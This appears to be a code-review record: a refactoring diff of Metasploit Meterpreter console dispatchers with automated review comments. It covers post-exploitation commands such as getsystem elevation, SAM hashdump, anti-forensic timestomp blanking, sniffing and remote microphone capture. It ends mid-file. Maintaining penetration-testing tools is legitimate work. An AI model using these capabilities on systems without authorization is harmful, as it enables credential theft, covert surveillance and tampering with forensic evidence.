'Start slinging packets between hosts', + 'networkpug_stop' => 'Stop slinging packets between hosts', } end @@ -75,7 +75,7 @@ def setup_tapdev end def proxy_packets() - while 1 + while True # Ghetto :\ sd = Rex::ThreadSafe.select([ @channel.lsock, @tapdev ], nil, nil) 
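Review bot: `while True` in proxy_packets (the `@@ -75,7 +75,7 @@` hunk of networkpug.rb) raises NameError at runtime: Ruby's boolean literal is lowercase `true`, and `True` is a constant lookup that fails unless something in scope defines it, which nothing visible here does. The original `while 1` at least ran; the idiomatic replacement is `loop do` with the existing closing `end`, or at minimum `while true`. proxy_packets' body continues outside the hunk, so the matching `end` is not visible here.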
@@ -175,7 +175,7 @@ def cmd_networkpug_start(*args) print_line("#{tapname} created with a hwaddr of #{mac}, ctrl-c when done") - response, @channel = client.networkpug.networkpug_start(interface, filter) + _, @channel = client.networkpug.networkpug_start(interface, filter) if(@channel) @thread_stuff = Rex::ThreadFactory.spawn("MeterpreterNetworkPUGReceiver", false) { diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb index 18172d0416b2d..3b1647ae176ba 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb @@ -25,10 +25,10 @@ class Console::CommandDispatcher::Priv::Elevate ELEVATE_TECHNIQUE_DESCRIPTION = [ - "All techniques available", - "Named Pipe Impersonation (In Memory/Admin)", - "Named Pipe Impersonation (Dropper/Admin)", - "Token Duplication (In Memory/Admin)" + 'All techniques available', + 'Named Pipe Impersonation (In Memory/Admin)', + 'Named Pipe Impersonation (Dropper/Admin)', + 'Token Duplication (In Memory/Admin)' ] # @@ -36,7 +36,7 @@ class Console::CommandDispatcher::Priv::Elevate # def commands { - "getsystem" => "Attempt to elevate your privilege to that of local system." + 'getsystem' => 'Attempt to elevate your privilege to that of local system.' } end @@ -44,7 +44,7 @@ def commands # Name for this dispatcher. # def name - "Priv: Elevate" + 'Priv: Elevate' end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb index 9bb258c90ab74..584fac88f4636 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb 
@@ -22,7 +22,7 @@ class Console::CommandDispatcher::Priv::Passwd # def commands { - "hashdump" => "Dumps the contents of the SAM database" + 'hashdump' => 'Dumps the contents of the SAM database' } end @@ -30,7 +30,7 @@ def commands # Name for this dispatcher. # def name - "Priv: Password database" + 'Priv: Password database' end # diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb index 7af38ddeb84e6..6641222d3a779 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb 
@@ -2,163 +2,164 @@ require 'rex/post/meterpreter' module Rex - module Post - module Meterpreter - module Ui - ### - # - # This class provides commands that interact with the timestomp feature set of - # the privilege escalation extension. - # - ### - class Console::CommandDispatcher::Priv::Timestomp - Klass = Console::CommandDispatcher::Priv::Timestomp - - include Console::CommandDispatcher - - @@timestomp_opts = Rex::Parser::Arguments.new( - "-m" => [ true, "Set the \"last written\" time of the file" ], - "-a" => [ true, "Set the \"last accessed\" time of the file" ], - "-c" => [ true, "Set the \"creation\" time of the file" ], - "-e" => [ true, "Set the \"mft entry modified\" time of the file" ], - "-z" => [ true, "Set all four attributes (MACE) of the file" ], - "-f" => [ true, "Set the MACE of attributes equal to the supplied file" ], - "-b" => [ false, "Set the MACE timestamps so that EnCase shows blanks" ], - "-r" => [ false, "Set the MACE timestamps recursively on a directory" ], - "-v" => [ false, "Display the UTC MACE values of the file" ], - "-h" => [ false, "Help banner" ] - ) - - # - # List of supported commands. - # - def commands - { - "timestomp" => "Manipulate file MACE attributes" - } - end - - # - # Name for this dispatcher. - # - def name - "Priv: Timestomp" - end - - # - # This command provides the same level of features that vinnie's command - # line timestomp interface provides with a similar argument set. 
- # - def cmd_timestomp(*args) - paths = [] - - modified = nil - accessed = nil - creation = nil - emodified = nil - - blank_file_mace = false - blank_directory_mace = false - get_file_mace = false - help = false - - @@timestomp_opts.parse(args) do |opt, _idx, val| - case opt - when "-m" - modified = str_to_time(val) - when "-a" - accessed = str_to_time(val) - when "-c" - creation = str_to_time(val) - when "-e" - emodified = str_to_time(val) - when "-z" - modified = str_to_time(val) - accessed = str_to_time(val) - creation = str_to_time(val) - emodified = str_to_time(val) - when "-f" - print_status("Pulling MACE attributes from #{val}") - hash = client.priv.fs.get_file_mace(val) - if hash - modified = hash['Modified'] - accessed = hash['Accessed'] - creation = hash['Created'] - emodified = hash['Entry Modified'] - end - when "-b" - blank_file_mace = true - when "-r" - blank_directory_mace = true - when "-v" - get_file_mace = true - when "-h" - help = true - when nil - paths << val - end - end - - if paths.empty? - print_line("\nNo paths specified.") - return nil - end - - if !(modified || accessed || creation || emodified || - blank_file_mace || blank_directory_mace || get_file_mace) || help - print_line("\nUsage: timestomp OPTIONS\n" + - @@timestomp_opts.usage) - return nil - end - - paths.uniq.each do |path| - - # If any one of the four times were specified, change them. 
- if modified || accessed || creation || emodified - print_status("Setting specific MACE attributes on #{path}") - client.priv.fs.set_file_mace(path, modified, accessed, creation, emodified) - end - - if blank_file_mace - print_status("Blanking file MACE attributes on #{path}") - client.priv.fs.blank_file_mace(path) - end - - if blank_directory_mace - print_status("Blanking directory MACE attributes on #{path}") - client.priv.fs.blank_directory_mace(path) - end - - if get_file_mace - hash = client.priv.fs.get_file_mace(path) - print_status("Showing MACE attributes for #{path}") - print_line("Modified : #{hash['Modified']}") - print_line("Accessed : #{hash['Accessed']}") - print_line("Created : #{hash['Created']}") - print_line("Entry Modified: #{hash['Entry Modified']}") - end - end - end - - protected - - # - # Converts a date/time in the form of MM/DD/YYYY HH24:MI:SS - # - def str_to_time(str) # :nodoc: - unless str.nil? - _r, mon, day, year, hour, min, sec = - str.match("^(\\d+?)/(\\d+?)/(\\d+?) (\\d+?):(\\d+?):(\\d+?)$").to_a - end - - if str.nil? || mon.nil? - raise ArgumentError, "Invalid date format, expected MM/DD/YYYY HH24:MI:SS (got #{str})" - end - - Time.mktime(year, mon, day, hour, min, sec, 0) - end +module Post +module Meterpreter +module Ui + +### +# +# This class provides commands that interact with the timestomp feature set of +# the privilege escalation extension. 
+# +### +class Console::CommandDispatcher::Priv::Timestomp + Klass = Console::CommandDispatcher::Priv::Timestomp + + include Console::CommandDispatcher + + @@timestomp_opts = Rex::Parser::Arguments.new( + "-m" => [ true, "Set the \"last written\" time of the file" ], + "-a" => [ true, "Set the \"last accessed\" time of the file" ], + "-c" => [ true, "Set the \"creation\" time of the file" ], + "-e" => [ true, "Set the \"mft entry modified\" time of the file" ], + "-z" => [ true, "Set all four attributes (MACE) of the file" ], + "-f" => [ true, "Set the MACE of attributes equal to the supplied file" ], + "-b" => [ false, "Set the MACE timestamps so that EnCase shows blanks" ], + "-r" => [ false, "Set the MACE timestamps recursively on a directory" ], + "-v" => [ false, "Display the UTC MACE values of the file" ], + "-h" => [ false, "Help banner" ] + ) + + # + # List of supported commands. + # + def commands + { + 'timestomp' => 'Manipulate file MACE attributes' + } + end + + # + # Name for this dispatcher. + # + def name + 'Priv: Timestomp' + end + + # + # This command provides the same level of features that vinnie's command + # line timestomp interface provides with a similar argument set. 
+ # + def cmd_timestomp(*args) + paths = [] + + modified = nil + accessed = nil + creation = nil + emodified = nil + + blank_file_mace = false + blank_directory_mace = false + get_file_mace = false + help = false + + @@timestomp_opts.parse(args) do |opt, _idx, val| + case opt + when "-m" + modified = str_to_time(val) + when "-a" + accessed = str_to_time(val) + when "-c" + creation = str_to_time(val) + when "-e" + emodified = str_to_time(val) + when "-z" + modified = str_to_time(val) + accessed = str_to_time(val) + creation = str_to_time(val) + emodified = str_to_time(val) + when "-f" + print_status("Pulling MACE attributes from #{val}") + hash = client.priv.fs.get_file_mace(val) + if hash + modified = hash['Modified'] + accessed = hash['Accessed'] + creation = hash['Created'] + emodified = hash['Entry Modified'] end + when "-b" + blank_file_mace = true + when "-r" + blank_directory_mace = true + when "-v" + get_file_mace = true + when "-h" + help = true + when nil + paths << val end end + + if paths.empty? + print_line("\nNo paths specified.") + return nil + end + + if !(modified || accessed || creation || emodified || + blank_file_mace || blank_directory_mace || get_file_mace) || help + print_line("\nUsage: timestomp OPTIONS\n" + + @@timestomp_opts.usage) + return nil + end + + paths.uniq.each do |path| + + # If any one of the four times were specified, change them. 
+ if modified || accessed || creation || emodified + print_status("Setting specific MACE attributes on #{path}") + client.priv.fs.set_file_mace(path, modified, accessed, creation, emodified) + end + + if blank_file_mace + print_status("Blanking file MACE attributes on #{path}") + client.priv.fs.blank_file_mace(path) + end + + if blank_directory_mace + print_status("Blanking directory MACE attributes on #{path}") + client.priv.fs.blank_directory_mace(path) + end + + if get_file_mace + hash = client.priv.fs.get_file_mace(path) + print_status("Showing MACE attributes for #{path}") + print_line("Modified : #{hash['Modified']}") + print_line("Accessed : #{hash['Accessed']}") + print_line("Created : #{hash['Created']}") + print_line("Entry Modified: #{hash['Entry Modified']}") + end + end + end + + protected + + # + # Converts a date/time in the form of MM/DD/YYYY HH24:MI:SS + # + def str_to_time(str) # :nodoc: + unless str.nil? + _r, mon, day, year, hour, min, sec = + str.match("^(\\d+?)/(\\d+?)/(\\d+?) (\\d+?):(\\d+?):(\\d+?)$").to_a + end + + if str.nil? || mon.nil? + raise ArgumentError, "Invalid date format, expected MM/DD/YYYY HH24:MI:SS (got #{str})" + end + + Time.mktime(year, mon, day, hour, min, sec, 0) end end +end +end +end +end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/python.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/python.rb index 7ac10d8daf362..2a21874008ab3 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/python.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/python.rb @@ -29,9 +29,9 @@ def name # def commands { - 'python_reset' => 'Resets/restarts the Python interpreter', - 'python_execute' => 'Execute a python command string', - 'python_import' => 'Import/run a python file or module' + 'python_reset' => 'Resets/restarts the Python interpreter', + 'python_execute' => 'Execute a python command string', + 'python_import' => 'Import/run a python file or module' } end 
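Review bot: The whole file is re-indented in this hunk, so the actual change (single-quoting the two strings in `commands` and `name`) is buried under roughly 160 moved lines; a separate whitespace-only commit, or leaving the indent alone, would keep the functional diff reviewable. Independently, on the new side the `-r` option is described as `"Set the MACE timestamps recursively on a directory"` but its handler only flips `blank_directory_mace`, which ends in `client.priv.fs.blank_directory_mace(path)`; if that call blanks rather than sets the timestamps, the help text should read `"Blank the MACE timestamps recursively on a directory"` so an operator is not surprised by the result. `str_to_time` also anchors its pattern with `^`/`$`; `\A`/`\z` is the stricter whole-string anchor, although a single argv token is unlikely to carry a newline in practice.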
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
index 6748e25d124c5..5c71863f33a9a 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
@@ -30,21 +30,22 @@ def initialize(shell)
 def commands
 #all = {
 {
- "sniffer_interfaces" => "Enumerate all sniffable network interfaces",
- "sniffer_start" => "Start packet capture on a specific interface",
- "sniffer_stop" => "Stop packet capture on a specific interface",
- "sniffer_stats" => "View statistics of an active capture",
- "sniffer_dump" => "Retrieve captured packet data to PCAP file",
- "sniffer_release" => "Free captured packets on a specific interface instead of downloading them"
+ 'sniffer_interfaces' => 'Enumerate all sniffable network interfaces',
+ 'sniffer_start' => 'Start packet capture on a specific interface',
+ 'sniffer_stop' => 'Stop packet capture on a specific interface',
+ 'sniffer_stats' => 'View statistics of an active capture',
+ 'sniffer_dump' => 'Retrieve captured packet data to PCAP file',
+ 'sniffer_release' => 'Free captured packets on a specific interface instead of downloading them'
 }
+ # TODO: Determine why these are commented out
 #reqs = {
- # "sniffer_interfaces" => ['sniffer_interfaces'],
- # "sniffer_start" => ['sniffer_capture_start'],
- # "sniffer_stop" => ['sniffer_capture_stop'],
- # "sniffer_stats" => ['sniffer_capture_stats'],
- # "sniffer_dump" => ['sniffer_capture_dump'],
- # "sniffer_release" => ['sniffer_capture_release']
+ # 'sniffer_interfaces' => [COMMAND_ID_NIFFER_INTERFACES],
+ # 'sniffer_start' => [COMMAND_ID_NIFFER_CAPTURE_START],
+ # 'sniffer_stop' => [COMMAND_ID_NIFFER_CAPTURE_STOP],
+ # 'sniffer_stats' => [COMMAND_ID_NIFFER_CAPTURE_STATS],
+ # 'sniffer_dump' => [COMMAND_ID_NIFFER_CAPTURE_DUMP],
+ # 'sniffer_release' => [COMMAND_ID_NIFFER_CAPTURE_RELEASE]
 #}
 #filter_commands(all, reqs)
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/audio_output.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/audio_output.rb
index 068ca77ae7632..5f43247cfdbb6 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/audio_output.rb
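Review bot: The rewritten (still commented-out) reqs entries use `COMMAND_ID_NIFFER_INTERFACES` through `COMMAND_ID_NIFFER_CAPTURE_RELEASE`, which look like mistyped names for the sniffer constants the rest of this commit would call `COMMAND_ID_SNIFFER_*`; anyone acting on the new `TODO` and uncommenting the block would get a NameError instead of a working filter. Since the lines are being rewritten anyway, fix the spelling now, e.g. `# 'sniffer_start' => [COMMAND_ID_SNIFFER_CAPTURE_START],`. While the filter stays disabled every sniffer command is offered on every session regardless of whether the loaded extension exposes it, so the TODO would be more useful if it stated that consequence rather than only asking why the block is commented out.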
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/audio_output.rb
@@ -21,14 +21,9 @@ class Console::CommandDispatcher::Stdapi::AudioOutput
 # List of supported commands.
 #
 def commands
- all = {
+ {
 'play' => 'play a waveform audio file (.wav) on the target system'
 }
- reqs = {
- 'play' => []
- }
-
- filter_commands(all, reqs)
 end
 #
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
index 4feaf1430cc27..ed744476f8e2d 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
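Review bot: Removing the empty `reqs` hash and the `filter_commands` call is behaviour-preserving, but it also deletes the only place a capability requirement for `play` could be declared, at the very moment the series is gating every other dispatcher's commands on command IDs. If the stdapi audio-output request has an ID constant like the `COMMAND_ID_STDAPI_*` names used elsewhere in this commit, `play` should be listed against it so it is not offered on sessions whose Meterpreter lacks the handler; if there deliberately is none, a one-line comment such as `# no server-side capability check: play is always offered` would stop the next reader from re-adding the filter. The enclosing class continues outside the hunk.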
@@ -98,28 +98,28 @@ def commands
 reqs = {
 'cat' => [],
- 'cd' => ['stdapi_fs_chdir'],
- 'checksum' => CHECKSUM_ALGORITHMS.map { |a| "stdapi_fs_#{a}" },
- 'del' => ['stdapi_fs_rm'],
- 'dir' => ['stdapi_fs_stat', 'stdapi_fs_ls'],
+ 'cd' => [COMMAND_ID_STDAPI_FS_CHDIR],
+ 'checksum' => [COMMAND_ID_STDAPI_FS_MD5, COMMAND_ID_STDAPI_FS_SHA1],
+ 'del' => [COMMAND_ID_STDAPI_FS_RM],
+ 'dir' => [COMMAND_ID_STDAPI_FS_STAT, COMMAND_ID_STDAPI_FS_LS],
 'download' => [],
 'edit' => [],
 'getlwd' => [],
- 'getwd' => ['stdapi_fs_getwd'],
+ 'getwd' => [COMMAND_ID_STDAPI_FS_GETWD],
 'lcd' => [],
 'lpwd' => [],
- 'ls' => ['stdapi_fs_stat', 'stdapi_fs_ls'],
+ 'ls' => [COMMAND_ID_STDAPI_FS_STAT, COMMAND_ID_STDAPI_FS_LS],
 'lls' => [],
- 'mkdir' => ['stdapi_fs_mkdir'],
- 'pwd' => ['stdapi_fs_getwd'],
- 'rmdir' => ['stdapi_fs_delete_dir'],
- 'rm' => ['stdapi_fs_delete_file'],
- 'mv' => ['stdapi_fs_file_move'],
- 'cp' => ['stdapi_fs_file_copy'],
- 'chmod' => ['stdapi_fs_chmod'],
- 'search' => ['stdapi_fs_search'],
+ 'mkdir' => [COMMAND_ID_STDAPI_FS_MKDIR],
+ 'pwd' => [COMMAND_ID_STDAPI_FS_GETWD],
+ 'rmdir' => [COMMAND_ID_STDAPI_FS_DELETE_DIR],
+ 'rm' => [COMMAND_ID_STDAPI_FS_DELETE_FILE],
+ 'mv' => [COMMAND_ID_STDAPI_FS_FILE_MOVE],
+ 'cp' => [COMMAND_ID_STDAPI_FS_FILE_COPY],
+ 'chmod' => [COMMAND_ID_STDAPI_FS_CHMOD],
+ 'search' => [COMMAND_ID_STDAPI_FS_SEARCH],
 'upload' => [],
- 'show_mount' => ['stdapi_fs_mount_show'],
+ 'show_mount' => [COMMAND_ID_STDAPI_FS_MOUNT_SHOW],
 }
 filter_commands(all, reqs)
@@ -436,7 +436,6 @@ def cmd_download(*args)
 src_items = []
 last = nil
 dest = nil
- continue = false
 tries = false
 tries_no = 0
 opts = {}
@@ -451,7 +450,6 @@ def cmd_download(*args)
 recursive = true
 opts['recursive'] = true
 when "-c"
- continue = true
 opts['continue'] = true
 when "-l"
 tries = true
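Review bot: `'checksum' => [COMMAND_ID_STDAPI_FS_MD5, COMMAND_ID_STDAPI_FS_SHA1]` replaces a list that was derived from `CHECKSUM_ALGORITHMS`, so the two can now drift: adding an algorithm to the constant (which the checksum command presumably still consults, outside this hunk) will no longer add its command ID to the requirement list, and the command will be offered on sessions that cannot serve the new algorithm. If the ID constants follow the `COMMAND_ID_STDAPI_FS_<ALGO>` pattern the list can stay derived, e.g. `'checksum' => CHECKSUM_ALGORITHMS.map { |a| Object.const_get("COMMAND_ID_STDAPI_FS_#{a.upcase}") },` against whichever module actually defines them; otherwise add `# keep in sync with CHECKSUM_ALGORITHMS` next to the literal. The `continue` local dropped in the two later hunks was write-only, so those removals are fine. `commands` and `cmd_download` both extend beyond the hunks shown.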
@@ -498,7 +496,7 @@ def cmd_download(*args)
 # Use search if possible for recursive pattern matching. It will work
 # more intuitively since it will not try to match on intermediate
 # directories, only file names.
- if glob && recursive && client.commands.include?('stdapi_fs_search')
+ if glob && recursive && client.commands.include?(COMMAND_ID_STDAPI_FS_SEARCH)
 files = client.fs.file.search(src, glob, recursive)
 if !files.empty?
@@ -724,7 +722,7 @@ def cmd_ls(*args)
 # Check session capabilities
 is_glob = client.fs.file.is_glob?(path)
 if is_glob
- if !client.commands.include?('stdapi_fs_search')
+ if !client.commands.include?(COMMAND_ID_STDAPI_FS_SEARCH)
 print_line('File globbing not supported with this session')
 return
 end
@@ -1013,7 +1011,7 @@ def cmd_upload_tabs(str, words)
 # sometimes it wouldn't execute successfully especailly on bad network.
 #
 def tab_complete_cfilenames(str, words)
- if client.commands.include?('stdapi_fs_ls')
+ if client.commands.include?(COMMAND_ID_STDAPI_FS_LS)
 return client.fs.dir.match(str) rescue nil
 end
@@ -1024,7 +1022,7 @@ def tab_complete_cfilenames(str, words)
 # Provide a generic tab completion for client directory names.
 #
 def tab_complete_cdirectory(str, words)
- if client.commands.include?('stdapi_fs_ls')
+ if client.commands.include?(COMMAND_ID_STDAPI_FS_LS)
 return client.fs.dir.match(str, true) rescue nil
 end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/mic.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/mic.rb
index e3b31ab41bc5b..14f5141ad0232 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/mic.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/mic.rb
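Review bot: The four `client.commands.include?(COMMAND_ID_…)` checks now compare against integer IDs, but nothing in these hunks shows whether `client.commands` holds integers or the method-name strings it used to hold; if the session still registers names as strings at this point in the series, every check is always false, so recursive glob downloads silently take the slower path, `ls` with a glob reports "File globbing not supported", and remote tab completion never runs. None of those failures raise, which makes a representation mismatch easy to miss. Either confirm in this commit that `client.commands` is populated with IDs, or route all four checks through one predicate on the client (something like `command_supported?(id)`) that owns the representation so the dispatcher stops depending on it. `cmd_download`, `cmd_ls` and the two tab-completion helpers all extend beyond the hunks shown.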
@@ -3,198 +3,198 @@ require 'bindata' module Rex - module Post - module Meterpreter - module Ui - - ### - # - # Mic - Capture audio from the remote system - # - ### - class Console::CommandDispatcher::Stdapi::Mic - Klass = Console::CommandDispatcher::Stdapi::Mic - - include Console::CommandDispatcher - - # - # List of supported commands. - # - def commands - all = { - 'mic_start' => 'start capturing an audio stream from the target mic', - 'mic_stop' => 'stop capturing audio', - 'mic_list' => 'list all microphone interfaces', - 'listen' => 'listen to a saved audio recording via audio player' - } - reqs = { - 'mic_start' => [ 'audio_mic_start' ], - 'mic_stop' => [ 'audio_mic_stop' ], - 'mic_list' => [ 'audio_mic_list' ], - 'listen' => [ 'audio_mic_start' ] - } - - filter_commands(all, reqs) - end - - # - # Name for this dispatcher - # - def name - "Stdapi: Mic" - end - - def cmd_mic_list - client.mic.mic_list - if client.mic.mic_list.length == 0 - print_error("No mics were found") - return - end - - client.mic.mic_list.each_with_index do |name, indx| - print_line("#{indx + 1}: #{name}") - end - end - - def audio_file_wave_header(sample_rate_hz:, num_channels:, bits_per_sample:, data_size:) - subchunk1_size = 16 - chunk_size = 4 + (8 + subchunk1_size) + (8 + data_size) - byte_rate = sample_rate_hz * num_channels * bits_per_sample / 8 - block_align = num_channels * bits_per_sample / 8 - - [ - BinData::Int32be.new(0x52494646), # ChunkID: "RIFF" - BinData::Int32le.new(chunk_size), # ChunkSize - BinData::Int32be.new(0x57415645), # Format: "WAVE" - BinData::Int32be.new(0x666d7420), # SubChunk1ID: "fmt " - BinData::Int32le.new(16), # SubChunk1Size - BinData::Int16le.new(1), # AudioFormat - BinData::Int16le.new(num_channels), # NumChannels - BinData::Int32le.new(sample_rate_hz), # SampleRate - BinData::Int32le.new(byte_rate), # ByteRate - BinData::Int16le.new(block_align), # BlockAlign - BinData::Int16le.new(bits_per_sample), # BitsPerSample - 
BinData::Int32be.new(0x64617461), # SubChunk2ID: "data" - BinData::Int32le.new(data_size) # SubChunk2Size - ] - end - - def cmd_mic_start(*args) - get_data = lambda do |channel, file| - data = channel.read(65536) - if data - ::File.open(file, 'a') do |f| - f.write(data) - end - return data.length - end - return 0 - end - device_id = 1 - duration = 1800 - saved_audio_path = Rex::Text.rand_text_alpha(8) + ".wav" - - mic_start_opts = Rex::Parser::Arguments.new( - "-h" => [ false, "Help Banner" ], - "-d" => [ true, "The stream duration in seconds (Default: 1800)" ], # 30 min - "-m" => [ true, "Microphone device index to record from (1: system default)" ], - "-s" => [ true, "The saved audio file path (Default: '#{saved_audio_path}')" ] - ) - - mic_start_opts.parse(args) do |opt, _idx, val| - case opt - when "-h" - print_line("Usage: mic_start [options]\n") - print_line("Streams and records audio from the target microphone.") - print_line(mic_start_opts.usage) - return - when "-d" - duration = val.to_i - when "-m" - device_id = val.to_i - when "-s" - saved_audio_path = val - end - end - - mic_list = client.mic.mic_list - if mic_list.length == 0 - print_error("Target does not have a mic") - return - end - if device_id < 1 || device_id > mic_list.length - print_error("Target does not have a mic with an id of #{device_id}") - return - end - - channel = client.mic.mic_start(device_id) - if channel.nil? 
- print_error("Mic failed to start streaming.") - return - end - print_status("Saving to audio file: #{saved_audio_path}") - print_status("Streaming started...") - total_data_len = 0 - begin - ::File.open(saved_audio_path, 'wb') do |outfile| - audio_file_wave_header(sample_rate_hz: 11025, num_channels: 1, bits_per_sample: 16, data_size: 2_000_000_000).each { - |e| e.write(outfile) - } - end - ::Timeout.timeout(duration) do - while client do - Rex::sleep(0.5) - total_data_len += get_data.call(channel, saved_audio_path) - end - end - rescue ::Timeout::Error - ensure - total_data_len += get_data.call(channel, saved_audio_path) - client.mic.mic_stop - print_status("Streaming stopped.") - # Now that we know the actual length of data, update the file header. - ::File.open(saved_audio_path, 'rb+') do |outfile| - outfile.seek(0, ::IO::SEEK_SET) - audio_file_wave_header(sample_rate_hz: 11025, num_channels: 1, bits_per_sample: 16, data_size: total_data_len).each { - |e| e.write(outfile) - } - end - end - end - - def cmd_listen(*args) - filename = nil - - listen_opts = Rex::Parser::Arguments.new( - "-h" => [ false, "Help Banner" ], - "-f" => [ true, "audio filename" ] - ) - - listen_opts.parse(args) do |opt, _idx, val| - case opt - when "-h" - print_line("Usage: listen -f \n") - print_line("Plays saved audio from a file.") - print_line(listen_opts.usage) - return - when "-f" - filename = val - end - end - - if filename.nil? - print_error("use '-f' option to provide a filename for playback") - return - end - - Rex::Compat.play_sound(::File.expand_path(filename)) - end - - def cmd_mic_stop - client.mic.mic_stop - end +module Post +module Meterpreter +module Ui + +### +# +# Mic - Capture audio from the remote system +# +### +class Console::CommandDispatcher::Stdapi::Mic + Klass = Console::CommandDispatcher::Stdapi::Mic + + include Console::CommandDispatcher + + # + # List of supported commands. 
+ # + def commands + all = { + 'mic_start' => 'start capturing an audio stream from the target mic', + 'mic_stop' => 'stop capturing audio', + 'mic_list' => 'list all microphone interfaces', + 'listen' => 'listen to a saved audio recording via audio player' + } + reqs = { + 'mic_start' => [COMMAND_ID_STDAPI_AUDIO_MIC_START], + 'mic_stop' => [COMMAND_ID_STDAPI_AUDIO_MIC_STOP], + 'mic_list' => [COMMAND_ID_STDAPI_AUDIO_MIC_LIST], + 'listen' => [COMMAND_ID_STDAPI_AUDIO_MIC_START] + } + + filter_commands(all, reqs) + end + + # + # Name for this dispatcher + # + def name + "Stdapi: Mic" + end + + def cmd_mic_list + client.mic.mic_list + if client.mic.mic_list.length == 0 + print_error("No mics were found") + return + end + + client.mic.mic_list.each_with_index do |name, indx| + print_line("#{indx + 1}: #{name}") + end + end + + def audio_file_wave_header(sample_rate_hz:, num_channels:, bits_per_sample:, data_size:) + subchunk1_size = 16 + chunk_size = 4 + (8 + subchunk1_size) + (8 + data_size) + byte_rate = sample_rate_hz * num_channels * bits_per_sample / 8 + block_align = num_channels * bits_per_sample / 8 + + [ + BinData::Int32be.new(0x52494646), # ChunkID: "RIFF" + BinData::Int32le.new(chunk_size), # ChunkSize + BinData::Int32be.new(0x57415645), # Format: "WAVE" + BinData::Int32be.new(0x666d7420), # SubChunk1ID: "fmt " + BinData::Int32le.new(16), # SubChunk1Size + BinData::Int16le.new(1), # AudioFormat + BinData::Int16le.new(num_channels), # NumChannels + BinData::Int32le.new(sample_rate_hz), # SampleRate + BinData::Int32le.new(byte_rate), # ByteRate + BinData::Int16le.new(block_align), # BlockAlign + BinData::Int16le.new(bits_per_sample), # BitsPerSample + BinData::Int32be.new(0x64617461), # SubChunk2ID: "data" + BinData::Int32le.new(data_size) # SubChunk2Size + ] + end + + def cmd_mic_start(*args) + get_data = lambda do |channel, file| + data = channel.read(65536) + if data + ::File.open(file, 'a') do |f| + f.write(data) + end + return data.length + end + return 0 
+ end + device_id = 1 + duration = 1800 + saved_audio_path = Rex::Text.rand_text_alpha(8) + ".wav" + + mic_start_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help Banner" ], + "-d" => [ true, "The stream duration in seconds (Default: 1800)" ], # 30 min + "-m" => [ true, "Microphone device index to record from (1: system default)" ], + "-s" => [ true, "The saved audio file path (Default: '#{saved_audio_path}')" ] + ) + + mic_start_opts.parse(args) do |opt, _idx, val| + case opt + when "-h" + print_line("Usage: mic_start [options]\n") + print_line("Streams and records audio from the target microphone.") + print_line(mic_start_opts.usage) + return + when "-d" + duration = val.to_i + when "-m" + device_id = val.to_i + when "-s" + saved_audio_path = val + end + end + + mic_list = client.mic.mic_list + if mic_list.length == 0 + print_error("Target does not have a mic") + return + end + if device_id < 1 || device_id > mic_list.length + print_error("Target does not have a mic with an id of #{device_id}") + return + end + + channel = client.mic.mic_start(device_id) + if channel.nil? + print_error("Mic failed to start streaming.") + return + end + print_status("Saving to audio file: #{saved_audio_path}") + print_status("Streaming started...") + total_data_len = 0 + begin + ::File.open(saved_audio_path, 'wb') do |outfile| + audio_file_wave_header(sample_rate_hz: 11025, num_channels: 1, bits_per_sample: 16, data_size: 2_000_000_000).each { + |e| e.write(outfile) + } + end + ::Timeout.timeout(duration) do + while client do + Rex::sleep(0.5) + total_data_len += get_data.call(channel, saved_audio_path) end end + rescue ::Timeout::Error + ensure + total_data_len += get_data.call(channel, saved_audio_path) + client.mic.mic_stop + print_status("Streaming stopped.") + # Now that we know the actual length of data, update the file header. 
